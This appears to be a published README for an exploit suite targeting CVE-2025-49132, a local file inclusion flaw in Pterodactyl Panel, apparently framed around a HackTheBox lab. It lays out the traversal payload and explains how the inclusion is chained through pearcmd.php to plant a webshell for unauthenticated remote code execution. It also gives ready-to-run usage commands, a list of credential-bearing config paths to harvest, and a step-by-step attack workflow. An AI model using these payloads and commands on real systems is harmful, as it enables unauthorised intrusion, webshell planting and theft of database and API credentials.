Share
## https://sploitus.com/exploit?id=C233554B-5BC2-5DB4-8ACD-9E5A9315C406
```
 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•‘      β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•‘       β•šβ–ˆβ–ˆβ•”β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•‘
β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
 β•šβ•β•β•β•β•β•   β•šβ•β•   β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•β•šβ•β•     β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•β•β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β•
```

```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  β–‘β–’β–“β–ˆ PTERODACTYL PANEL EXPLOIT SUITE β–ˆβ–“β–’β–‘                                 β”‚
β”‚  β–‘β–’β–“β–ˆ CVE-2025-49132                  β–ˆβ–“β–’β–‘                                 β”‚
β”‚  β–‘β–’β–“β–ˆ Author: DΛΣMӨП                 β–ˆβ–“β–’β–‘                                 β”‚
β”‚  β–‘β–’β–“β–ˆ For authorised security testing β–ˆβ–“β–’β–‘                                 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```

---

```
    ╔══════════════════════════════════════════════════════════════╗
    β•‘  "The panel thinks it speaks one language.                  β•‘
    β•‘   We taught it to read another."                            β•‘
    β•‘                                                             β•‘
    β•‘   Two tools. One vulnerability. Total filesystem access.    β•‘
    β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
```

---

## `// THREAT_BRIEFING`

**CVE-2025-49132** β€” Pterodactyl Panel suffers from a **Local File Inclusion** vulnerability in the locale loading mechanism at `/locales/locale.json`. The `locale` and `namespace` query parameters are not sanitised, allowing directory traversal to include arbitrary `.php` files from the server filesystem. When chained with PHP's `pearcmd.php` (available on most systems with PEAR installed), this LFI can be escalated to **unauthenticated Remote Code Execution**.

```
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚   /locales/locale.json            β”‚
  β”‚     ?locale=../../../../../../    β”‚    ← directory traversal
  β”‚     &namespace=config/database    β”‚    ← file inclusion
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                    β”‚
                    β–Ό
       β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
       β”‚  Arbitrary .php read   β”‚
       β”‚  Config exfiltration   β”‚
       β”‚  Credential harvesting β”‚
       β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```

> If you've recently discovered a certain **HackTheBox** lab featuring a familiar winged reptile... these tools might come in handy. Just saying.

---

## `// ARSENAL`

```
╔══════════════════════════════════════════════════════════════════════════════╗
β•‘                                                                            β•‘
β•‘   β–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–€β–„β–‘β–ˆβ–‘β–‘β–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–ˆβ–‘β–€β–ˆβ–€                         β•‘
β•‘   β–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–€β–„β–‘β–ˆβ–‘β–‘β–‘β–ˆβ–€β–€β–‘β–€β–€β–ˆβ–‘β–ˆβ–‘β–‘β–‘β–ˆβ–€β–€β–‘β–ˆβ–‘β–ˆβ–‘β–‘β–ˆβ–‘                         β•‘
β•‘   β–‘β–€β–‘β–‘β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–€β–€β–‘β–€β–€β–€β–‘β–€β–€β–€β–‘β–€β–€β–€β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–‘β–€β–‘                         β•‘
β•‘                                                                            β•‘
β•‘   pearlescent.py β€” PEAR LFI-to-RCE Exploit                                β•‘
β•‘   The heavy hitter. Chains pearcmd.php config-create to write a webshell   β•‘
β•‘   to disk via LFI, then triggers it for full command execution.            β•‘
β•‘                                                                            β•‘
β•‘   ● CVE:    CVE-2025-49132                                                 β•‘
β•‘   ● Chain:  LFI β†’ pearcmd.php β†’ config-create β†’ webshell β†’ RCE            β•‘
β•‘   ● Auth:   None required (unauthenticated)                                β•‘
β•‘   ● Author: DΛΣMӨП                                                        β•‘
β•‘                                                                            β•‘
╠══════════════════════════════════════════════════════════════════════════════╣
β•‘                                                                            β•‘
β•‘   β–‘β–ˆβ–€β–ˆβ–‘β–€β–ˆβ–€β–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–„β–‘β–ˆβ–€β–ˆβ–‘β–‘β–‘β–‘β–‘β–ˆβ–‘β–‘β–‘β–ˆβ–€β–€β–‘β–€β–ˆβ–€                                  β•‘
β•‘   β–‘β–ˆβ–€β–€β–‘β–‘β–ˆβ–‘β–‘β–ˆβ–€β–€β–‘β–ˆβ–€β–„β–‘β–ˆβ–‘β–ˆβ–‘β–„β–„β–„β–‘β–ˆβ–‘β–‘β–‘β–ˆβ–€β–€β–‘β–‘β–ˆβ–‘                                  β•‘
β•‘   β–‘β–€β–‘β–‘β–‘β–‘β–€β–‘β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–€β–€β–€β–‘β–‘β–‘β–‘β–‘β–€β–€β–€β–‘β–€β–‘β–‘β–‘β–€β–€β–€                                  β•‘
β•‘                                                                            β•‘
β•‘   ptero-lfi-rce.py β€” Pterodactyl LFI Reader & Scanner                     β•‘
β•‘   The recon blade. Reads arbitrary .php files off the target via LFI.      β•‘
β•‘   Supports single-file reads, batch scanning with wordlists, and           β•‘
β•‘   automatic credential extraction from config files.                       β•‘
β•‘                                                                            β•‘
β•‘   ● CVE:    CVE-2025-49132                                                 β•‘
β•‘   ● Mode:   LFI file read / batch scan                                    β•‘
β•‘   ● Auth:   None required (unauthenticated)                                β•‘
β•‘   ● Author: DΛΣMӨП                                                        β•‘
β•‘                                                                            β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
```

---

## `// USAGE β€” pearlescent.py`

```
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
        β–ˆ  PEARLESCENT β€” LFI to RCE Pipeline  β–ˆ
         β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€
```

**Requirements:** `curl` (uses subprocess, no pip dependencies)

```bash
# Execute a single command on the target
python3 pearlescent.py  ''

# Examples
python3 pearlescent.py panel.pterodactyl.htb 'id'
python3 pearlescent.py panel.pterodactyl.htb 'cat /etc/passwd'
python3 pearlescent.py panel.pterodactyl.htb 'ls -la /var/www'
```

**How it works:**

```
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚  Stage 1     │────▢│  Stage 2         │────▢│  Output       β”‚
  β”‚  Write shell β”‚     β”‚  Trigger via LFI β”‚     β”‚  Parse & show β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
        β”‚                      β”‚
        β–Ό                      β–Ό
  pearcmd.php            /tmp/shell.php
  config-create          included via LFI
  writes PHP to          system() executes
  /tmp/shell.php         your command
```

1. Abuses `pearcmd.php` via the LFI to write a PHP webshell containing your command to `/tmp/shell.php`
2. Triggers the webshell by including it through the same LFI vector
3. Parses the command output from the PEAR config-create response format

---

## `// USAGE β€” ptero-lfi-rce.py`

```
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
        β–ˆ  PTERO-LFI β€” Filesystem Recon Blade   β–ˆ
         β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€β–€
```

**Requirements:** `pip install requests`

### Single File Read

```bash
# Read a specific PHP config file
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -p ../../config/database.php

# Read with full output (no truncation)
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -p ../../config/app.php --raw
```

### Batch Scan with Wordlist

```bash
# Scan multiple paths and save hits
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -w paths.txt -o loot/
```

### Connection Options

```bash
# Route through Burp proxy
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -p ../../config/database.php \
    --proxy http://127.0.0.1:8080

# With cookie authentication
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -p ../../config/database.php \
    --cookie "session=abc123"

# Skip TLS verification
python3 ptero-lfi-rce.py -u https://panel.pterodactyl.htb -p ../../config/database.php \
    --no-verify
```

### Useful Paths to Try

```
../../config/database.php       ← DB credentials (MySQL/PostgreSQL)
../../config/app.php            ← APP_KEY, debug mode, app URL
../../.env                      ← environment variables (if .php check bypassed)
../../config/mail.php           ← SMTP credentials
../../config/services.php       ← API keys for external services
```

> The scanner auto-extracts DB credentials and Laravel `APP_KEY` values when found. Watch the output closely.

---

## `// WORKFLOW`

```
  β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘
  β–‘                                                            β–‘
  β–‘   STEP 1  ─────────────────────────────────────────────    β–‘
  β–‘   Run ptero-lfi-rce.py to enumerate config files           β–‘
  β–‘   Pull database.php, app.php, services.php                 β–‘
  β–‘   Extract credentials and APP_KEY                          β–‘
  β–‘                                                            β–‘
  β–‘   STEP 2  ─────────────────────────────────────────────    β–‘
  β–‘   Run pearlescent.py for command execution                 β–‘
  β–‘   Confirm RCE with 'id' or 'whoami'                        β–‘
  β–‘   Escalate from there                                      β–‘
  β–‘                                                            β–‘
  β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘
```

---

## `// DISCLAIMER`

```
╔══════════════════════════════════════════════════════════════════════════════╗
β•‘                                                                            β•‘
β•‘   These tools are provided for AUTHORISED SECURITY TESTING and             β•‘
β•‘   EDUCATIONAL PURPOSES only. Use them in CTF environments,                 β•‘
β•‘   HackTheBox labs, or engagements where you have explicit                  β•‘
β•‘   written permission.                                                      β•‘
β•‘                                                                            β•‘
β•‘   Unauthorised access to computer systems is illegal.                      β•‘
β•‘   The author assumes no liability for misuse.                              β•‘
β•‘                                                                            β•‘
β•‘   β–‘β–’β–“β–ˆ DΛΣMӨП β–ˆβ–“β–’β–‘                                                        β•‘
β•‘                                                                            β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
```

---

```
    Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·
    :                                                   :
    :   "Every panel has a locale.                      :
    :    Every locale has a path.                       :
    :    Every path leads somewhere                     :
    :    it was never meant to go."                     :
    :                                                   :
    :                          β€” DΛΣMӨП, 2025           :
    :                                                   :
    Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·
```